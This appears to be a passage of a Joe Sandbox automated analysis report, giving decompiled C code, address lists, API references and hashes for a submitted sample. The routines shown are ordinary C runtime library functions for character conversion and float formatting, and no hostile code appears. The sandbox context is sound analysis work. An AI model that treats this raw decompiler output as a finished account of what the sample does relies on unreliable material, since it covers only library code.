                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if( *_t72 != 0) {
                                                                                                                                                                                                        						E0040EC86( &_v20, _a16);
                                                                                                                                                                                                        						_t43 = _v20;
                                                                                                                                                                                                        						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                                                        						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                                                        							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                                                                        							__eflags = _t46;
                                                                                                                                                                                                        							if(_t46 == 0) {
                                                                                                                                                                                                        								__eflags = _a4;
                                                                                                                                                                                                        								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									L10:
                                                                                                                                                                                                        									__eflags = _v8;
                                                                                                                                                                                                        									if(_v8 != 0) {
                                                                                                                                                                                                        										_t53 = _v12;
                                                                                                                                                                                                        										_t11 = _t53 + 0x70;
                                                                                                                                                                                                        										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                        										__eflags =  *_t11;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									return 1;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                        								_t54 = E0040BFC1(__eflags);
                                                                                                                                                                                                        								 *_t54 = 0x2a;
                                                                                                                                                                                                        								__eflags = _v8;
                                                                                                                                                                                                        								if(_v8 != 0) {
                                                                                                                                                                                                        									_t54 = _v12;
                                                                                                                                                                                                        									_t33 = _t54 + 0x70;
                                                                                                                                                                                                        									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                        									__eflags =  *_t33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								return _t54 | 0xffffffff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t56 = _v20;
                                                                                                                                                                                                        							_t65 =  *(_t56 + 0xac);
                                                                                                                                                                                                        							__eflags = _t65 - 1;
                                                                                                                                                                                                        							if(_t65 <= 1) {
                                                                                                                                                                                                        								L17:
                                                                                                                                                                                                        								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                                                                        									goto L21;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = _t72[1];
                                                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                                                        									goto L21;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L19:
                                                                                                                                                                                                        								_t57 =  *(_t56 + 0xac);
                                                                                                                                                                                                        								__eflags = _v8;
                                                                                                                                                                                                        								if(_v8 == 0) {
                                                                                                                                                                                                        									return _t57;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                        								return _t57;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _a12 - _t65;
                                                                                                                                                                                                        							if(_a12 < _t65) {
                                                                                                                                                                                                        								goto L17;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _a4;
                                                                                                                                                                                                        							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                                                        							_t56 = _v20;
                                                                                                                                                                                                        							if(_t58 != 0) {
                                                                                                                                                                                                        								goto L19;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L17;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t59 = _a4;
                                                                                                                                                                                                        						__eflags = _t59;
                                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                                        							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t60 = _a4;
                                                                                                                                                                                                        						if(_t60 != 0) {
                                                                                                                                                                                                        							 *_t60 = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x004152a9
                                                                                                                                                                                                        0x004152b0
                                                                                                                                                                                                        0x004152c7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004152b7
                                                                                                                                                                                                        0x004152b9
                                                                                                                                                                                                        0x004152d3
                                                                                                                                                                                                        0x004152d8
                                                                                                                                                                                                        0x004152db
                                                                                                                                                                                                        0x004152de
                                                                                                                                                                                                        0x00415307
                                                                                                                                                                                                        0x0041530e
                                                                                                                                                                                                        0x00415310
                                                                                                                                                                                                        0x00415391
                                                                                                                                                                                                        0x004153ac
                                                                                                                                                                                                        0x004153ae
                                                                                                                                                                                                        0x004152ee
                                                                                                                                                                                                        0x004152ee
                                                                                                                                                                                                        0x004152f1
                                                                                                                                                                                                        0x004152f3
                                                                                                                                                                                                        0x004152f6
                                                                                                                                                                                                        0x004152f6
                                                                                                                                                                                                        0x004152f6
                                                                                                                                                                                                        0x004152f6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004152fc
                                                                                                                                                                                                        0x00415370
                                                                                                                                                                                                        0x00415370
                                                                                                                                                                                                        0x00415375
                                                                                                                                                                                                        0x0041537b
                                                                                                                                                                                                        0x0041537e
                                                                                                                                                                                                        0x00415380
                                                                                                                                                                                                        0x00415383
                                                                                                                                                                                                        0x00415383
                                                                                                                                                                                                        0x00415383
                                                                                                                                                                                                        0x00415383
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00415387
                                                                                                                                                                                                        0x00415312
                                                                                                                                                                                                        0x00415315
                                                                                                                                                                                                        0x0041531b
                                                                                                                                                                                                        0x0041531e
                                                                                                                                                                                                        0x00415345
                                                                                                                                                                                                        0x00415348
                                                                                                                                                                                                        0x0041534e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00415350
                                                                                                                                                                                                        0x00415353
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00415355
                                                                                                                                                                                                        0x00415355
                                                                                                                                                                                                        0x0041535b
                                                                                                                                                                                                        0x0041535e
                                                                                                                                                                                                        0x004152cc
                                                                                                                                                                                                        0x004152cc
                                                                                                                                                                                                        0x00415367
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00415367
                                                                                                                                                                                                        0x00415320
                                                                                                                                                                                                        0x00415323
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00415327
                                                                                                                                                                                                        0x00415338
                                                                                                                                                                                                        0x0041533e
                                                                                                                                                                                                        0x00415340
                                                                                                                                                                                                        0x00415343
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00415343
                                                                                                                                                                                                        0x004152e0
                                                                                                                                                                                                        0x004152e3
                                                                                                                                                                                                        0x004152e5
                                                                                                                                                                                                        0x004152eb
                                                                                                                                                                                                        0x004152eb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004152bb
                                                                                                                                                                                                        0x004152bb
                                                                                                                                                                                                        0x004152c0
                                                                                                                                                                                                        0x004152c4
                                                                                                                                                                                                        0x004152c4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004152c0
                                                                                                                                                                                                        0x004152b9

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                                                                        • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                        • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t25 = _a16;
                                                                                                                                                                                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                                                                        					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t34 = _t25 - 0x66;
                                                                                                                                                                                                        					if(_t25 != 0x66) {
                                                                                                                                                                                                        						__eflags = _t25 - 0x61;
                                                                                                                                                                                                        						if(_t25 == 0x61) {
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							__eflags = _t25 - 0x41;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L7;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						return _t26;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        0x004134e0
                                                                                                                                                                                                        0x004134e6
                                                                                                                                                                                                        0x00413559
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004134ed
                                                                                                                                                                                                        0x004134ed
                                                                                                                                                                                                        0x004134f0
                                                                                                                                                                                                        0x0041350b
                                                                                                                                                                                                        0x0041350e
                                                                                                                                                                                                        0x0041352e
                                                                                                                                                                                                        0x00413540
                                                                                                                                                                                                        0x00413510
                                                                                                                                                                                                        0x00413510
                                                                                                                                                                                                        0x00413513
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00413515
                                                                                                                                                                                                        0x00413527
                                                                                                                                                                                                        0x00413527
                                                                                                                                                                                                        0x00413513
                                                                                                                                                                                                        0x0041355e
                                                                                                                                                                                                        0x00413562
                                                                                                                                                                                                        0x004134f2
                                                                                                                                                                                                        0x0041350a
                                                                                                                                                                                                        0x0041350a
                                                                                                                                                                                                        0x004134f0

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                        • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%